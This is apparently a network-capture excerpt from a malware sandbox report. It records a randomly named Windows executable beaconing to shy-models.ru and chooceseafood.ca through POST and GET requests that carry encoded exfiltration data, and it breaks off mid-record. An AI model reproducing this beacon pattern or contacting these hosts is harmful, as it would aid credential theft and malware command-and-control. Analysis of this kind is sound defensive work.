May 27, 2024 12:22:17.549057961 CEST	1236	IN	Data Raw: 36 35 20 2d 32 37 74 32 37 20 2d 36 35 7a 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d 37 36 2e 35 20 30 2e 35 74 2d 31 30 35 2e 35 20 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 Data Ascii: 65 -27t27 -65zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18
May 27, 2024 12:22:17.549067020 CEST	225	IN	Data Raw: 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f Data Ascii: c=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-45', 'auto'); ga('send', 'pageview');</script></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.12	49752	185.215.4.44	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:22.887981892 CEST	697	OUT	POST /spev/ HTTP/1.1 Host: www.shy-models.ru Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.shy-models.ru Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.shy-models.ru/spev/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 67 5a 73 54 75 33 65 5a 66 51 77 61 2f 36 6e 71 49 61 31 31 4a 63 31 6f 6d 77 76 69 41 41 71 42 77 63 69 4b 47 76 61 67 79 37 4b 51 38 45 35 7a 50 31 32 63 4a 70 77 49 5a 6e 70 61 77 47 48 4d 63 45 6c 31 63 78 2b 4e 76 34 34 72 4a 47 6e 69 2f 55 32 49 37 59 55 4f 6d 75 2b 6b 69 39 4d 71 53 73 61 6a 2f 4f 70 67 34 53 69 75 32 31 54 71 7a 43 4b 72 37 75 5a 58 57 4b 72 52 5a 63 78 66 6f 64 46 48 4c 4b 54 6a 50 67 58 6f 2f 71 4d 52 72 36 64 6d 31 5a 30 4b 57 72 66 4e 54 39 71 4e 53 33 49 65 73 76 72 53 54 77 53 51 62 75 36 78 33 61 6b 49 67 78 6c 34 32 50 48 4f 61 55 6f 74 63 67 3d 3d Data Ascii: VlEHDVvh=gZsTu3eZfQwa/6nqIa11Jc1omwviAAqBwciKGvagy7KQ8E5zP12cJpwIZnpawGHMcEl1cx+Nv44rJGni/U2I7YUOmu+ki9MqSsaj/Opg4Siu21TqzCKr7uZXWKrRZcxfodFHLKTjPgXo/qMRr6dm1Z0KWrfNT9qNS3IesvrSTwSQbu6x3akIgxl42PHOaUotcg==
May 27, 2024 12:22:23.537396908 CEST	749	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=g57CJsimRHFgdKAD6hz4; Domain=.shy-models.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:22:23 GMT Date: Mon, 27 May 2024 10:22:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.12	49753	185.215.4.44	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:25.427316904 CEST	717	OUT	POST /spev/ HTTP/1.1 Host: www.shy-models.ru Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.shy-models.ru Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.shy-models.ru/spev/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 67 5a 73 54 75 33 65 5a 66 51 77 61 39 61 33 71 4c 35 74 31 42 63 31 72 6a 77 76 69 4a 67 72 70 77 63 75 4b 47 75 66 2f 79 4a 75 51 2f 68 56 7a 49 41 61 63 61 5a 77 49 53 48 6f 51 7a 32 48 48 63 45 5a 58 63 7a 71 4e 76 38 6f 72 4a 48 58 69 2b 6e 65 50 39 49 55 4d 7a 65 2b 6d 74 64 4d 71 53 73 61 6a 2f 4f 4e 47 34 53 36 75 33 45 6a 71 68 7a 4b 71 39 65 5a 55 56 4b 72 52 50 73 78 62 6f 64 46 68 4c 49 32 4d 50 6a 76 6f 2f 72 38 52 76 2f 68 35 73 70 30 4d 59 4c 65 48 56 2b 54 48 61 31 4a 57 6e 65 44 68 59 30 4b 47 54 49 72 72 6f 6f 73 65 31 79 78 31 37 59 2b 2b 58 58 56 6b 48 70 36 45 4d 2b 64 4b 78 6e 61 62 69 55 37 41 59 36 6a 6d 30 77 63 3d Data Ascii: VlEHDVvh=gZsTu3eZfQwa9a3qL5t1Bc1rjwviJgrpwcuKGuf/yJuQ/hVzIAacaZwISHoQz2HHcEZXczqNv8orJHXi+neP9IUMze+mtdMqSsaj/ONG4S6u3EjqhzKq9eZUVKrRPsxbodFhLI2MPjvo/r8Rv/h5sp0MYLeHV+THa1JWneDhY0KGTIrroose1yx17Y++XXVkHp6EM+dKxnabiU7AY6jm0wc=
May 27, 2024 12:22:26.076365948 CEST	749	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=LXfcFecsr3O3Ti2j3lVZ; Domain=.shy-models.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:22:25 GMT Date: Mon, 27 May 2024 10:22:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.12	49754	185.215.4.44	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:28.061499119 CEST	1730	OUT	POST /spev/ HTTP/1.1 Host: www.shy-models.ru Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.shy-models.ru Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.shy-models.ru/spev/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 67 5a 73 54 75 33 65 5a 66 51 77 61 39 61 33 71 4c 35 74 31 42 63 31 72 6a 77 76 69 4a 67 72 70 77 63 75 4b 47 75 66 2f 79 4a 6d 51 2f 54 64 7a 4c 6e 75 63 4c 70 77 49 52 48 6f 54 7a 32 48 57 63 41 31 54 63 7a 57 7a 76 36 30 72 49 6c 66 69 35 57 65 50 7a 49 55 4d 73 4f 2b 6a 69 39 4e 2b 53 73 4b 2f 2f 4f 39 47 34 53 36 75 33 47 72 71 69 69 4b 71 6d 65 5a 58 57 4b 72 4e 5a 63 78 7a 6f 63 67 55 4c 49 7a 7a 4f 53 50 6f 2f 4c 73 52 70 64 4a 35 6b 70 30 4f 62 4c 66 53 56 2f 76 45 61 31 55 76 6e 65 6d 70 59 7a 6d 47 52 4a 66 30 73 34 73 6c 69 42 6c 57 78 76 6d 77 4f 77 35 6f 49 70 61 35 41 4d 78 74 36 31 72 4b 36 44 71 33 41 4a 50 63 6a 58 47 55 6a 38 77 76 68 35 30 68 30 6d 54 73 41 30 55 79 33 4f 73 76 4c 4d 57 45 33 4b 73 50 65 6b 57 57 75 37 45 56 78 30 6f 77 67 76 45 51 70 78 57 4f 72 6c 42 75 77 65 59 33 31 57 79 42 32 65 6b 4a 70 55 53 62 37 6a 6a 58 49 2b 32 2f 48 49 53 45 73 79 31 65 68 75 67 32 31 52 42 77 6b 78 59 66 34 77 52 32 42 39 56 4e 4a 46 7a 47 51 31 54 75 59 [TRUNCATED] Data Ascii: VlEHDVvh=gZsTu3eZfQwa9a3qL5t1Bc1rjwviJgrpwcuKGuf/yJmQ/TdzLnucLpwIRHoTz2HWcA1TczWzv60rIlfi5WePzIUMsO+ji9N+SsK//O9G4S6u3GrqiiKqmeZXWKrNZcxzocgULIzzOSPo/LsRpdJ5kp0ObLfSV/vEa1UvnempYzmGRJf0s4sliBlWxvmwOw5oIpa5AMxt61rK6Dq3AJPcjXGUj8wvh50h0mTsA0Uy3OsvLMWE3KsPekWWu7EVx0owgvEQpxWOrlBuweY31WyB2ekJpUSb7jjXI+2/HISEsy1ehug21RBwkxYf4wR2B9VNJFzGQ1TuYC9A7AAGVCLPQk/QvZbThBDo8gPiIVTk9RE1X602NyEeqiJVh7Bf2WMYIAcO7jrtmJgrIU/Bhaipf0dTyWN/1qfnYpMza7maOyGia7+1IFZDN2/tBnapCeDCxv410l7Nmw7mStklUlTVJ8ZG7377yn4uSN6riXV1Mbr7+ts/F2FyRBdON31Q0i3FKpq77Y/1JzzwkFg6owxblOHOF9yBlF0fS5kN9E6GPHBoKP3JODlkvRe/xd5yCRK8IuzrKtj6N3ovForu+5oRFsjG2ZMkm7uGA8FuevCLRCZBub84nRBwtslPiXPMyafOwBrrjH+rVsPU5ivGGO2NoMwwOR1s3V7OAIOYCwIWam8KbpBTH8IkGv4Dz7CHYW/Oc96tuw9mf18NcdX1S2BVMHHpOqRalVi8kSk5xl05HR4Wqo1RUm1Ibhud1mhZDudwG5MyD7XNfu9TKK7oLhGa1DrA02RS9sRTAiOI+lGZjqa/WalBMVfzlJXl2Ipx3nifEk/Ih1RQgYniHY36IIg+pvWkEQEyBcneRbDKHeVH2pc1HiVUYiRj+JyWZ6ZuT31M2g0vph2owkP66jx2/b+rV3HmPLW4KQR9qNxbiA90U4EpAp0/fZuDyLbtyaV4tX3S5Q99grWu3xi5eyqakizNiz8LYKvQl2eRxMUmJOWH58n [TRUNCATED]
May 27, 2024 12:22:28.734328985 CEST	749	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=GqnXXu3LgBBewU80pyEN; Domain=.shy-models.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:22:28 GMT Date: Mon, 27 May 2024 10:22:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.12	49755	185.215.4.44	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:30.598040104 CEST	425	OUT	GET /spev/?VlEHDVvh=tbEztHv7aRBF16/vS4ReUtdihzrMDj2O7MCPG/vC1Jml0QkKRnSSU8sUdUNE92nxSgZvf0qXlo0KJW6hnlqWydczzuvw5M1cQ8Ki08JizjbM/1/wqRnw39c=&BHPD=o2nt HTTP/1.1 Host: www.shy-models.ru Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:22:31.375857115 CEST	749	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=531fzAP8F7U8q9adsI66; Domain=.shy-models.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:22:31 GMT Date: Mon, 27 May 2024 10:22:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.12	49756	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:36.602850914 CEST	706	OUT	POST /ru1k/ HTTP/1.1 Host: www.chooceseafood.ca Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.chooceseafood.ca Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.chooceseafood.ca/ru1k/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 59 64 4b 63 4f 2b 37 34 33 43 64 50 70 65 57 39 4f 30 59 54 48 76 4c 5a 50 75 65 6f 6a 41 73 79 53 4d 44 41 67 5a 52 44 61 68 51 2b 66 6e 54 62 2f 44 4b 70 74 4a 31 67 2b 47 6a 4b 50 32 6d 44 6b 54 52 73 38 31 4c 57 77 69 78 76 51 50 65 65 55 4b 69 75 35 2f 6e 43 59 54 4d 2f 4f 41 68 73 2b 49 52 6f 4b 47 33 45 76 65 45 54 72 34 65 61 67 6f 67 7a 39 42 4a 67 70 71 58 4a 48 57 4c 64 50 79 6a 34 38 50 6a 4e 6d 34 58 39 6d 33 2f 54 6d 69 68 48 59 4a 52 66 73 64 48 35 6f 37 31 72 37 58 4d 55 4c 45 66 73 79 35 4e 66 56 4f 77 37 77 57 66 57 77 6c 58 66 59 52 55 45 50 4e 4f 69 51 77 3d 3d Data Ascii: VlEHDVvh=YdKcO+743CdPpeW9O0YTHvLZPueojAsySMDAgZRDahQ+fnTb/DKptJ1g+GjKP2mDkTRs81LWwixvQPeeUKiu5/nCYTM/OAhs+IRoKG3EveETr4eagogz9BJgpqXJHWLdPyj48PjNm4X9m3/TmihHYJRfsdH5o71r7XMULEfsy5NfVOw7wWfWwlXfYRUEPNOiQw==
May 27, 2024 12:22:37.072458982 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:36 GMT content-type: text/html; charset=utf-8 content-length: 1130 x-request-id: ab0d658f-ddd3-4342-b392-c82fd8ca1112 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McKA9SM5xIqpnHYedHj93z5ndFqssddHOLhTIrnoLfi4ezOiShtuxfKALmYyTHBBFYMtfLS9VBxqx00XFo37ag== set-cookie: parking_session=ab0d658f-ddd3-4342-b392-c82fd8ca1112; expires=Mon, 27 May 2024 10:37:37 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4b 41 39 53 4d 35 78 49 71 70 6e 48 59 65 64 48 6a 39 33 7a 35 6e 64 46 71 73 73 64 64 48 4f 4c 68 54 49 72 6e 6f 4c 66 69 34 65 7a 4f 69 53 68 74 75 78 66 4b 41 4c 6d 59 79 54 48 42 42 46 59 4d 74 66 4c 53 39 56 42 78 71 78 30 30 58 46 6f 33 37 61 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McKA9SM5xIqpnHYedHj93z5ndFqssddHOLhTIrnoLfi4ezOiShtuxfKALmYyTHBBFYMtfLS9VBxqx00XFo37ag==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:37.072540998 CEST	583	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWIwZDY1OGYtZGRkMy00MzQyLWIzOTItYzgyZmQ4Y2ExMTEyIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.12	49757	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:39.147805929 CEST	726	OUT	POST /ru1k/ HTTP/1.1 Host: www.chooceseafood.ca Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.chooceseafood.ca Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.chooceseafood.ca/ru1k/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 59 64 4b 63 4f 2b 37 34 33 43 64 50 76 2b 47 39 64 44 4d 54 4c 66 4c 65 41 4f 65 6f 71 67 73 75 53 4d 50 41 67 59 55 45 61 54 45 2b 66 46 4c 62 2b 42 69 70 75 4a 31 67 30 6d 6a 4c 41 57 6d 63 6b 54 64 65 38 77 72 57 77 6a 56 76 51 4f 75 65 56 35 4b 68 35 76 6e 4d 58 7a 4d 35 54 77 68 73 2b 49 52 6f 4b 43 6d 68 76 66 67 54 71 4a 75 61 68 4b 49 77 6a 78 4a 6a 35 61 58 4a 44 57 4c 5a 50 79 6a 4f 38 4c 36 46 6d 36 66 39 6d 32 6a 54 6d 77 5a 49 44 35 52 47 6f 64 47 71 6d 65 4d 69 79 6b 34 39 4b 48 7a 66 73 4c 46 64 55 49 68 68 76 6b 58 41 6c 6d 44 53 56 47 74 30 43 4f 7a 72 4c 2b 78 59 46 76 56 70 66 6e 43 6e 78 38 4e 50 4f 65 6d 67 68 58 30 3d Data Ascii: 